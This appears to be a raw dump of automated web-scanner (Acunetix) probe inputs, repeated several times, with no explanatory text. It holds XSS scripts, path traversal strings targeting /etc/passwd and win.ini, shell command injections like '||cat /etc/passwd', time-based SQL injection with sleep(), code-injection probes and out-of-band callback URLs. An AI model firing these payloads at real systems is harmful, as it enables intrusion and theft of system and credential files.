-1)

1

1

1

1

"

-1))

1<input autofocus onfocus=prompt(982428)>

||cat /etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

J1DfGXLe'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

1

1

dcUlWxDQ')

1

acunetix_wvs_invalid_filename

http://hitSHnAQ8izDW.bxss.me/

1

'&dir&'

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

cJuc2fNa'))

1

1

[url=http://www.acunetix.com]website security[/url]

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"&dir&"

1

1

1

1

comments

file:///etc/passwd

http://www.acunetix.tst

1_Da65h <ScRiPt >prompt(955625)</ScRiPt>

|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

'"

comments/.

1

1

1'"()&%<ScRiPt >prompt(999865)</ScRiPt>

'|dir

1

1

1

WEB-INF/web.xml

1

1

<!--

'"()&%<ScRiPt >prompt(977472)</ScRiPt>

"|dir

1

WEB-INF\web.xml

1

1

1

1

1_993253

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

acu3554\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3554

1

../../../../../../../../../../windows/win.ini.jpg

1

acux1307\xc0\xbez1\xc0\xbcz2a\x90bcxuca1307

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(959623)</ScRiPt>

1

1

................windowswin.ini

1

1<script>prompt(938164)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(995150)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?968002></ScRiPt>

1

1<ScRiPt >prompt(982422)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<video><source onerror="javascript:prompt(974804)">

response.write(9236388*9595301)

1

1

'+response.write(9236388*9595301)+'

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(939599)"></g></svg>

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(996371))>

WEB-INF/web.xml

"+response.write(9236388*9595301)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

WEB-INF\web.xml

1<iframe src='data:text/html

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

1

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(937112)>

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(961595)>

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

${99893+99953}

1

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1<img src=xyz OnErRor=prompt(985168)>

1

1

1&n942058=v993829

-1))

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

1

1<img/src=">" onerror=alert(990263)>

'|'ld

RXNSIXpt'

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

"|"ld

MD6O2EQb')

1

1<ScRiPt%20>prompt(965163)</sCripT>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1

1&lt

1

'

UN8a5PHM'))

testasp.vulnweb.com

/etc/passwd

'

1

1

1

1

-1

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

\xf6<img acu onmouseover=prompt(909301) //\xf6>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(906602)>

1

1

||cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://hitZRwX1Gnt7r.bxss.me/

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

-1))

<a href='http://www.acunetix.com'>website security</a>

1

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

1

1

[url=http://www.acunetix.com]website security[/url]

lriWTEb9'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'"

http://www.acunetix.tst

'&dir&'

comments/.

HeDEL1t9')

1

1_kdivc <ScRiPt >prompt(999502)</ScRiPt>

1

file:///etc/passwd

1

<!--

1

1

1

1'"()&%<ScRiPt >prompt(991050)</ScRiPt>

"&dir&"

Gcz9rJJo'))

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"()&%<ScRiPt >prompt(986943)</ScRiPt>

1

|dir

1

1

WEB-INF/web.xml

1

1

1_971609

1

'|dir

1

1

1

1

WEB-INF\web.xml

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

acu10314\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10314

1

1

../../../../../../../../../../boot.ini

acux3648\xc0\xbez1\xc0\xbcz2a\x90bcxuca3648

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(911092)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1<script>prompt(956632)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(991919)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931029></ScRiPt>

1

1

1

1<ScRiPt >prompt(924083)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(943262)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936514)"></g></svg>

1

response.write(9234012*9410351)

1

1<div style=width:expression(prompt(984938))>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'+response.write(9234012*9410351)+'

&cat /etc/passwd&

WEB-INF/web.xml

1

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

1

"+response.write(9234012*9410351)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(955624)>

1

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

cat /etc/passwd

1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(981599)>

`cat /etc/passwd`

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1<img src=xyz OnErRor=prompt(993363)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1

1

1

-1

1

${99831+99495}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(909735)>

'|'ld

1&n933775=v970515

1

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

"|"ld

1<ScRiPt%20>prompt(938899)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

)

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1&lt

!(()&&!|*|*|

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

'

bEjPrmiO'

1

\xf6<img acu onmouseover=prompt(991892) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

^(#$!@#$)(()))******

/etc/passwd

1

1

'

ocsGJ0Ql')

"

1

1

1

1<input autofocus onfocus=prompt(956057)>

testasp.vulnweb.com

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

"

1

QTbSZg1C'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

&dir

1

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

http://hit5LG5u0IZJb.bxss.me/

1

[url=http://www.acunetix.com]website security[/url]

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

-1)

"&dir&"

1_n2F3L <ScRiPt >prompt(909368)</ScRiPt>

1

1

1

1

-1))

1

comments

|dir

file:///etc/passwd

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

'|dir

comments/.

http://www.acunetix.tst

UWLFNL4h'

1

1

1

'"

1

WEB-INF/web.xml

1

fLxvfudZ')

1

"|dir

1'"()&%<ScRiPt >prompt(924245)</ScRiPt>

1

WEB-INF\web.xml

1

<!--

1

1

'"()&%<ScRiPt >prompt(963531)</ScRiPt>

1

OtVCG7ST'))

1

1

1

../../../../../../../../../../windows/win.ini

1

1_985070

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2080\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2080

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux6356\xc0\xbez1\xc0\xbcz2a\x90bcxuca6356

1

1

1

1<ScRiPt >prompt(976493)</ScRiPt>

1

................windowswin.ini

1

1<script>prompt(996369)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(964760)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903583></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(947508)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(938370)">

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(944294)"></g></svg>

1

1

response.write(9701247*9775166)

1

1<div style=width:expression(prompt(985759))>

WEB-INF/web.xml

1

'+response.write(9701247*9775166)+'

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

WEB-INF\web.xml

"+response.write(9701247*9775166)+"

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(949205)>

'&cat /etc/passwd&'

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(978157)>

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(979892)>

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

cat /etc/passwd

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img/src=">" onerror=alert(929788)>

1

1

${99769+100169}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<ScRiPt%20>prompt(946834)</sCripT>

1

`cat /etc/passwd`

1

1

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

|cat /etc/passwd#

)

1&lt

1&n903071=v917503

'|'ld

-1)

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

\xf6<img acu onmouseover=prompt(983236) //\xf6>

!(()&&!|*|*|

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

-1))

1

testasp.vulnweb.com

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(947786)>

NUPhxYdv'

1

1

/etc/passwd

'

1

<a href='http://www.acunetix.com'>website security</a>

1

1

Kg0yjhtj')

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

[url=http://www.acunetix.com]website security[/url]

1

"

1

AJjtXth7'))

1

http://hitzvjatNNWju.bxss.me/

1

1_H23eG <ScRiPt >prompt(909932)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

acunetix_wvs_invalid_filename

1

-1

1

1

comments

&dir

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

-1)

1

http://www.acunetix.tst

1

1

1

'&dir&'

comments/.

1

'"

-1))

1

"&dir&"

1

1'"()&%<ScRiPt >prompt(916181)</ScRiPt>

1

file:///etc/passwd

WbxFQdjs'

<!--

1

1

'"()&%<ScRiPt >prompt(982570)</ScRiPt>

|dir

1

1

1

rFxAuRX4')

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1_974690

1

"|dir

WEB-INF/web.xml

pV2MA9yS'))

1

1

1

1

1

1

WEB-INF\web.xml

1

acu2261\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2261

1

../../../../../../../../../../windows/win.ini

acux3477\xc0\xbez1\xc0\xbcz2a\x90bcxuca3477

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(929131)</ScRiPt>

1

1

1<script>prompt(920984)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(942111)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975250></ScRiPt>

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(990919)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<video><source onerror="javascript:prompt(995561)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922564)"></g></svg>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

response.write(9259773*9234699)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(997402))>

1

1

1

1

'+response.write(9259773*9234699)+'

1

1<iframe src='data:text/html

"+response.write(9259773*9234699)+"

1

1

&cat /etc/passwd&

1

1<body onload=prompt(973693)>

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(955503)>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(939769)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1

1<img/src=">" onerror=alert(994373)>

${100371+99852}

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

1

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

`cat /etc/passwd`

1

1<ScRiPt%20>prompt(925505)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

1some_inexistent_file_with_long_name%00.jpg

1&n992415=v904967

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&lt

)

1

|cat /etc/passwd#

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

1

\xf6<img acu onmouseover=prompt(955862) //\xf6>

1

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

gbt5769B'

1<input autofocus onfocus=prompt(930018)>

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

^(#$!@#$)(()))******

'"()

1

1

1

'

svXMWpx8')

<a href='http://www.acunetix.com'>website security</a>

1

1

/etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

cUk7H0Fp'))

1

'

1

1

1

1_PGhE4 <ScRiPt >prompt(951096)</ScRiPt>

-1

1

1

${@print(md5(acunetix_wvs_security_test))}

"

1

1

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1)

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

http://hitcktLVUiMxm.bxss.me/

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

1

1

1

1

&dir

comments

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

bu4tc39r'

http://www.acunetix.tst

1'"()&%<ScRiPt >prompt(921991)</ScRiPt>

'"

comments/.

1

1

IO7Huuqo')

1

'&dir&'

1

<!--

1

'"()&%<ScRiPt >prompt(944835)</ScRiPt>

file:///etc/passwd

1

Fm71pDjA'))

"&dir&"

1_944899

1

1

1

|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

WEB-INF/web.xml

'|dir

1

1

"|dir

WEB-INF\web.xml

1

acu5587\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5587

1

1

1

../../../../../../../../../../windows/win.ini

1

acux2866\xc0\xbez1\xc0\xbcz2a\x90bcxuca2866

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(995545)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<script>prompt(903029)</script>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(995036)</ScRiPt>

1

1

1

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984706></ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(961335)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

response.write(9445659*9739889)

1

1<video><source onerror="javascript:prompt(977189)">

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'+response.write(9445659*9739889)+'

1

&cat /etc/passwd&

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906477)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9445659*9739889)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

../../../../../../../../../../etc/passwd

1<div style=width:expression(prompt(948507))>

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<iframe src='data:text/html

1

WEB-INF/web.xml

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(940638)>

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

WEB-INF\web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(971261)>

1

1

-1

${99957+100215}

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(936740)>

`cat /etc/passwd`

1&n929958=v948282

1

1

-1)

1

1some_inexistent_file_with_long_name%00.jpg

1

1

|cat /etc/passwd#

1<img/src=">" onerror=alert(929515)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1<ScRiPt%20>prompt(931519)</sCripT>

'|'ld

1

^(#$!@#$)(()))******

'"()

'

testasp.vulnweb.com

1

YtgVy9XR'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

"|"ld

1&lt

1

"

1

/etc/passwd

1

E0Nq7Cel')

1

1

${@print(md5(acunetix_wvs_security_test))}

1

\xf6<img acu onmouseover=prompt(925263) //\xf6>

1

1

1

sf57SnW5'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

'

1

1<input autofocus onfocus=prompt(942482)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"

1

-1)

1

1

<a href='http://www.acunetix.com'>website security</a>

http://hitoZpxPQJoS1.bxss.me/

||cat /etc/passwd

acunetix_wvs_invalid_filename

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

[url=http://www.acunetix.com]website security[/url]

1

comments

1

GoQr34C6'

&dir

comments

1_eKoco <ScRiPt >prompt(949510)</ScRiPt>

1

1

1

6FzkIq5W')

1

file:///etc/passwd

http://www.acunetix.tst

comments/.

hCm2O212'))

1

'"

'&dir&'

1

1'"()&%<ScRiPt >prompt(920886)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

1

<!--

1

1

"&dir&"

1

'"()&%<ScRiPt >prompt(920572)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1_939298

1

|dir

1

1

1

../../../../../../../../../../windows/win.ini

'|dir

../../../../../../../../../../boot.ini

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

1

acu4280\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4280

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

acux8910\xc0\xbez1\xc0\xbcz2a\x90bcxuca8910

1

1

1

................windowswin.ini

1

1

1<ScRiPt >prompt(977585)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(972700)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(948717)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962182></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(973167)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(926947)">

1

1

response.write(9119099*9738461)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(984082)"></g></svg>

1

1

1<div style=width:expression(prompt(991698))>

1

'+response.write(9119099*9738461)+'

WEB-INF/web.xml

1

1<iframe src='data:text/html

"+response.write(9119099*9738461)+"

1

&cat /etc/passwd&

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

1<body onload=prompt(964252)>

'&cat /etc/passwd&'

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(950494)>

1

1

"&cat /etc/passwd&"

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(923013)>

1

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${99734+100071}

1<img/src=">" onerror=alert(980157)>

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

-1)

1<ScRiPt%20>prompt(919829)</sCripT>

1

|cat /etc/passwd#

1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n903405=v985341

-1))

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

1

1

"|"ld

